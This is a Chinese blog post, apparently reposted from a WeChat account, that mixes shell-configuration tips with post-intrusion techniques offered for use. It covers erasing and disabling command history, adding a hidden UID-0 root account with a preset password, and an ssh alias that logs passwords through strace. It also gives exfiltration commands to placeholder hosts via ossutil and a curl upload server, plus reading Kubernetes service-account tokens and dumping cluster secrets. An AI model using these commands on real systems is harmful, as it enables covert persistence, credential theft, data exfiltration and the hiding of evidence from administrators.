本来只是打算发几条实用命令,字数太少了干脆从笔记里面随便再捞几条放进来凑数2333
命令补全
iterm2 + zsh + autosuggestions
多终端历史命令同步
指定zsh写入的历史命令的路径,配合autosuggestions实用,对设备多的人来说非常实用
#历史命令的
HISTFILE="$HOME/Library/Mobile Documents/com~apple~CloudDocs/zsh/.zsh_history"
#记录历史命令条数
HISTSIZE=100000
SAVEHIST=100000
setopt appendhistory
同样的 $HOME/.ssh/, $HOME/.kube/一类的文件夹也可以配置自动同步
隐藏命令记录
入门
set+o history
进阶
export HISTFILE=/dev/null
高级
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0
清除指定行历史命令
清除540行到566行。
for h in $(seq 540566| tac);do history -d $h;done; history -d $(history 1| awk '{print $1}')
代理切换
alias(别名) 非常实用
alias proxy="export ALL_PROXY=http://127.0.0.1:8080"
alias noproxy="export https_proxy= http_proxy= all_proxy="
alias ips="export all_proxy="socks5://xxxx:xxxx@proxypool:80""
替换jenv:
alias jdk6="export JAVA_HOME=/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home"
alias jdk7="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home"
alias jdk8="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_151.jdk/Contents/Home"
alias jdk9="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-9.0.4.jdk/Contents/Home"
alias jdk10="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-10.0.2.jdk/Contents/Home"
alias jdk11="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-11.0.1.jdk/Contents/Home"
alias jdk12="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-12.0.1.jdk/Contents/Home"
alias jdk13="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-13.jdk/Contents/Home"
alias jdk14="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-14.0.1.jdk/Contents/Home"
alias jdk15="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-15.jdk/Contents/Home"
禁止HOMEBREW自动更新
避免brew安装/更新程序是自动更新其他程序
export HOMEBREW_NO_AUTO_UPDATE=true
二进制程序统一管理
所有编译好的工具可以统一丢到这目录,无需在alias去链接程序绝对路径,同样也可以配置iCloud自动同步。
export PATH=$PATH:/Users/$HOME/tools/bintools/
当前IP查看
内外网ip
ip(){
echo -e "e[32m[+] 内网:e[0m"
ifconfig|grep "inet "|awk -F ' ''{print $2}'
echo -e "ne[31m[+] 公网:e[0m"
curl cip.cc -s | tr -s 'n''n'
}
ip
文件备份1
cd /tmp
wget https://gosspublic.alicdn.com/ossutil/1.7.13/ossutil64 -O hulk
chmod +x hulk
echo "你的配置"|base64 -d >/tmp/.hulk
./hulk -c /tmp/.hulk cp /hulk.zip oss://xxxx/hulk.zip
rm -rf /tmp/.hulk
文件备份2
curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'
➜~ cat upload.py
from flask importFlask, request
app =Flask(__name__)
@app.route('/upload', methods=['POST'])
def upload():
file = request.files['file']
if".."in file.filename:
return'fuck u'
else:
file.save(file.filename)
return'File saved successfully'
if __name__ =='__main__':
print("curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'")
app.run(debug=True, host='0.0.0.0', port=58000)
linux整机备份
备份
dd if=/dev/vda of=/path/to/backup.img bs=4M
还原
dd if=/path/to/backup.img of=/dev/vda bs=4M
备份到远程
dd if=/dev/vda bs=4M| gzip -c | ssh root@xxxx "cat > /tmp/xxx_backup.img.gz"
还原:
gunzip -c xxx_backup.img.gz > xxx_backup.img
dd if=xxx_backup.img of=/dev/vda bs=4M
docker备份
所有的
docker ps -a --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash
仅在允许的
docker ps --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash
判断存在指定文件的docker容器
docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}'| grep true| cut -c2-| awk '{print "docker exec "$1" [ -f /home/s/www/xxxx.png ] && echo "$1" has this file"}'| sh
trantor-fe has this file
docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}'| grep true| cut -c2-| awk '{print "docker exec "$1" [ -f /lib/ld-musl-x86_64.so.1 ] && echo "$1" has this file"}'| sh
无netstat看网络连接
单项
grep -v "rem_address"/proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
ret = 0
n = length(str)
for (i = 1; i <= n; i++) {
c = tolower(substr(str, i, 1))
k = index("123456789abcdef", c)
ret = ret * 16 + k
}
return ret
} {x=hextodec(substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."hextodec(substr($2,i,2))}{print x":"hextodec(substr($2,index($2,":")+1,4))}'
双向
awk 'function hextodec(str,ret,n,i,k,c){
ret = 0
n = length(str)
for (i = 1; i <= n; i++) {
c = tolower(substr(str, i, 1))
k = index("123456789abcdef", c)
ret = ret * 16 + k
}
return ret
}
function getIP(str,ret){
ret=hextodec(substr(str,index(str,":")-2,2));
for (i=5; i>0; i-=2) {
ret = ret"."hextodec(substr(str,i,2))
}
ret = ret":"hextodec(substr(str,index(str,":")+1,4))
return ret
}
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}'/proc/net/tcp
Linux一条命令添加用户
useradd -p `openssl passwd -1 -salt 'salt' P@ssw0rd` ibm2 -o -u 0-g root -G root -s /bin/bash -d /home/guest
ssh密码备份
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
查看sa权限
cd /run/secrets/kubernetes.io/serviceaccount/
curl --cacert $PWD/ca.crt --header "Authorization: Bearer $(cat $PWD/token)"-H 'Content-Type: application/json'-i -s -k -X 'POST'--data-binary $'{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","metadata":{"creationTimestamp":null},"spec":{"namespace":"default"},"status":{"resourceRules":null,"nonResourceRules":null,"incomplete":false}}' https://$KUBERNETES_SERVICE_HOST:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews
etcd备份
etcdctl --endpoints=http://xxxx:2379 snapshot save sec.db
k8s备份
kubectl get namespaces -o name > namespaces.txt
kubectl get all --namespace=default-o yaml >default-namespace-resources.yaml
kubectl get clusterroles -o yaml > clusterroles.yaml
kubectl get clusterrolebindings -o yaml > clusterrolebindings.yaml
kubectl get deployments --all-namespaces -o yaml > deployments.yaml
kubectl get configmaps --all-namespaces -o yaml > configmaps.yaml
kubectl get secrets --all-namespaces -o yaml > secrets.yaml
kubectl get pods --all-namespaces -o yaml > pods.yaml
kubectl get serviceaccounts --all-namespaces -o yaml > serviceaccounts.yaml
kubectl cluster-info dump> cluster-info.log
查找高权限sa
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.name}{"t"}{.spec.serviceAccountName}{"t"}{.spec.nodeName}{"n"}{end}'
kubectl安装
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
mv ./kubectl /usr/local/bin/k
k auth can-i --list
最近创建的pod
kubectl get pods -A --sort-by=.metadata.creationTimestamp
命令执行不出网
Windows
for/f %i in('dir /s /b e:index.js')do(echo %i>%i.test.txt)%26(ipconfig >%i.ipconfig.txt)"
linux
find / -name index.js|while read f;do sh -c 'id;pwd;ifconfig' >$(dirname $f)/test.txt;done
ssh端口转发
ssh -L 本地端口:目标主机:目标端口 uesr@host [-N]
ssh -L 5432:192.168.60.110:5432 sysadm@192.168.60.110-p 2222
原文始发于微信公众号(Medi0cr1ty):对抗小技巧: 一些实用的运维命令
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论